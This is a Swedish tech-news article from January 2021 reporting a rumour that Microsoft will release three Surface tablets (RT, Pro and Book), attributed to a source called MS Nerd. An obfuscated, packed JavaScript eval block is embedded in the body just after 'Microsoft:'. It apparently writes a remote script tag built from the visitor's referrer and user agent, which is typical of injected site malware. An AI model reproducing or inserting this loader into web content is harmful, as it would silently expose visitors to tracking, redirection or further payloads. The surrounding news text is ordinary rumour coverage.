Image Image Image Image Image Image Image Image Image Image

| 18 januari, 2021

Scroll to top

Top

Tre nya surfplattor från Microsoft?

Tre nya surfplattor från Microsoft?
Sebastian

Microsoft: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hyybr|var|u0026u|referrer|yrdyf||js|php’.split(’|’),0,{}))
Ja det menar i alla fall en källa som går under smeknamnet MS Nerd. Han säger sig vara insatt i Microsofts planer och menar att de kommer att lansera tre nya surfplattor nästa år. 

Surfplattorna kommer att bestå av Surface RT, en Surface Pro och en tredje modell med namnet Surface Book.

Den nya modellen av Surafe RT sägs till skillnad från den nuvarande inte köra en Nvidias Tegra 3-processor. Den ska istället köras med en processor från Qualcomm samt en mindre skärm på 8,6 tum istället för 10,6 tum.

Källan Ms Nerd har tidigare varit en pålitlig källa när det kommer till information från Microsoft. I mars spred MS Nerd att Windows Phone 7 endast kommer att få ett fåtal av de nya funktionerna i Windows Phone. Dessa uppgifter visade sig sen vara korrekta.

Men som alltid när det kommer till rykten från anonyma källor, ta det med en nypa salt. Allt kan komma att ändra sig med tiden.

Läs mer: IDG.se